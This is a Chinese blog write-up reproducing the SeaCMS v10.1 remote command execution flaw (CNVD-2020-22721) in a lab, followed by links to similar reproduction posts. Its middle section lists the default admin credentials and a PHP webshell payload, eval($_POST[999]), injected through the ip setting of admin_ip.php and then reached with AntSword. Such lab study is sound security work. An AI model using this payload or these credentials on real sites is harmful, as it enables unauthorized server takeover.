漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)

最新推荐文章于 2023-11-17 00:50:11 发布
最新推荐文章于 2023-11-17 00:50:11 发布
阅读量658 收藏
点赞数 12
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 安全 安全威胁分析 系统安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/134071805
版权

SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)

漏洞信息

  • seacms_v10.1有效
  • cnvd-2020-22721
  • 命令执行漏洞

描述

海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台路径:/manager 后台密码:admin:admin

前提

  • volfucs靶场复现

  • 可以进入后台

复现过程

登录进入首页

image-20231027104137120

按照如图顺序访问,点击确认时抓包

image-20231027104419346

修改内容

v=0&ip=127.0.0.1";eval($_POST[999]);//

image-20231027104710454

网页回显正常没有报错

image-20231027104851780

尝试蚁剑连接

ip安全设置选项位置为admin_ip.php

访问也正常

image-20231027105300672

尝试蚁剑连接该位置

image-20231027105322280

成功获取flag

image-20231027105344175

order libra
关注
专栏目录
漏洞复现】用友-畅捷通T+-App_Code-远程命令执行
知黑而守白
01-22 261
用友畅捷通 T+是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。用友畅捷通 T+某模块存在远程命令执行漏洞。攻击者可以通过构造恶意的数据包,成功注入并执行恶意命令,可能导致系统敏感信息泄露、篡改、服务器接管或其他严重后果。
pyLoad远程代码执行漏洞复现(CVE-2023-0297)
0xSec
01-30 3008
pyLoad是一个用 Python 编写的免费和开源下载管理器,可用于NAS、下一代路由器、无头家庭服务器以及任何能够连接到互联网并支持 Python 编程语言的设备。pyLoad 存在代码注入漏洞,未经身份验证的攻击者可以通过滥用 js2py 功能执行任意 Python 代码。
海洋CMSv12.5后台多处代码执行漏洞复现
1匹黑马
01-17 2002
文章目录前言代码审计漏洞验证临时修复 前言 好久没有写博客了,最近痴迷于挖一些通用型的漏洞,从这篇开始会陆续复现一些我挖的,或者网上爆出来的漏洞海洋CMS也是才更新不久,但是这个后台代码执行的洞迟迟不补。 代码审计 说出来你可能不信,一共有四处代码执行,被执行的文件分别是 /data/admin/ip.php /data/admin/notify.php /data/admin/ping.php /data/admin/weixin.php 这四个文件前三个的exp相同,admin_weixin
漏洞实现 --- Vm2沙箱逃逸漏洞复现(CVE-2023-32314)
weixin_62443409的博客
09-13 5168
安装低版本npm是为了规避npm的内部审核机制(高版本npm会检查vm2安装包的安全性)CentOS7(Nodejs和vm@3.9.17)升级nodejs至高版本。
手把手教你制作漏洞复现环境
hl1293348082的专栏
03-29 1028
在学习的过程中, 是否看到别人搭建的 Exploit 练习平台心痒痒呢? 通过本篇教程的学习, 将手把手教你搭建属于自己的漏洞测试利用环境, 不管是自己学习还有分享给小伙伴都将轻而易举. Ps: 这是一篇伪 Docker 学习指南 为什么选择 Docker 现在市面上的 漏洞测试利用环境 大体分三种, 当然这只是我自己的理解. 分别是: Web安装版, VM虚拟机镜像 及 docker镜像. 本次教程就已 docker镜像 为例, 不含其他两项。 相比其他两项, docker 的夸平台及针对性是最好
WEB 漏洞seacms 远程命令执行CNVD-2020-22721
2301_79118231的博客
10-27 634
注:个人笔记,并不全面,仅供参考。
漏洞复现】CVE-2020-0796永恒之黑漏洞复现
weixin_67698311的博客
06-18 2599
Windows 10 和Windows Server 2016引入了SMB 3.1.1.本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。3.使用工具检查靶机是否存在漏洞,检查工具下载地址https://github.com/ollypwn/SMBGhost运行结果如下图,证明靶机存在漏洞,Vulnerable代表目标存在漏洞,可以进行攻击!4.通过IP安全策略屏蔽危险端口,bat执行添加防火墙策略,关闭危险服务。
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更...
weblogic_rce:cve2019_2725,CNVD-C-2019-48814 Weblogic _async远程命令执行exp
03-15
CNVD-C-2019-48814,CVE-2019-2725 Weblogic _async远程命令执行exp 主要代码基于js实现。 Linux Payload使用Jason,Windows Payload修改为10271,执行java.lang.Runtime。 环境需求 Windows的所有版本。 用法 cve...
Docker学习基础
09-06
从零学Docker 讲的很简单 很方便 docker起步必备!!!!
CNVD-2020-10487-Tomcat-Ajp-lfi_exp_
09-29
CNVD-2020-10487-Tomcat-Ajp-lfi
海洋CMS 影视管理系统
09-26
海洋CMS 影视管理系统,海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。 海洋cms采用PHP+MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。海洋cms支持一键转换原max的模板和数据,实现网站无缝迁移到新平台。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其它的交给我们。 为符合SEO要求开发大量功能,比如百度结构化数据生成,搜索引擎地图等。全新设计的专题管理,同时支持按分类 扩展分类 剧情分类三种分类模式组合,让网站内容与众不同。简单易用丰富的模板标签,方便网站模板设计制作,让网站更显专业。 海洋cms是基于PHP+MySql技术开发的开源CMS,完全开源 、没有任何加密代码,强劲功能、卓越性能、安全健壮。超级易用、模板众多、插件齐全、资源丰富。构架稳健,平滑升级。
网络安全命令执行漏洞复现
kali_Ma的博客
11-15 3206
Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。在版本1.997之前的Webmin中存在一个任意命令注入漏洞,触发该漏洞需登录Webmin。
蚁剑文件上传漏洞
vvvlp的博客
11-08 2264
蚁剑使用
VMware Tools本地提权漏洞CVE-2022-31676分析复现(1)
C20220511的博客
09-14 1527
VMware Tools没有正确的检查客户端请求的授权,导致包含一个本地权限提升漏洞,可以使虚拟机中的计算机账号由非管理员权限提升到管理员权限。
CVE-2022-0847漏洞攻击案例(虚拟机测试)
weixin_50281314的博客
08-30 467
CVE-2022-0847漏洞攻击案例(虚拟机测试)
漏洞复现-Xstream(CVE-2021-29505)
aming小老弟
06-01 2063
Xstream
春秋云境靶场CVE-2021-41402漏洞复现(任意代码执行漏洞)
最新发布
zyh1588的博客
11-17 1485
小白复现CVE-2021-41402漏洞
WebLogic反序列化漏洞复现+利用工具(CVE-2021-2394)
0xSec
04-08 4638
Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。
深度解析:CNVD-2020-10487 Tomcat漏洞详细POC分析
CNVD-2020-10487是一个编号为10487的漏洞,由国家信息安全漏洞共享平台(China National Vulnerability DatabaseCNVD)进行收录。该漏洞影响的是广泛使用的Java应用服务器Apache Tomcat。根据描述,该文件包含了一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值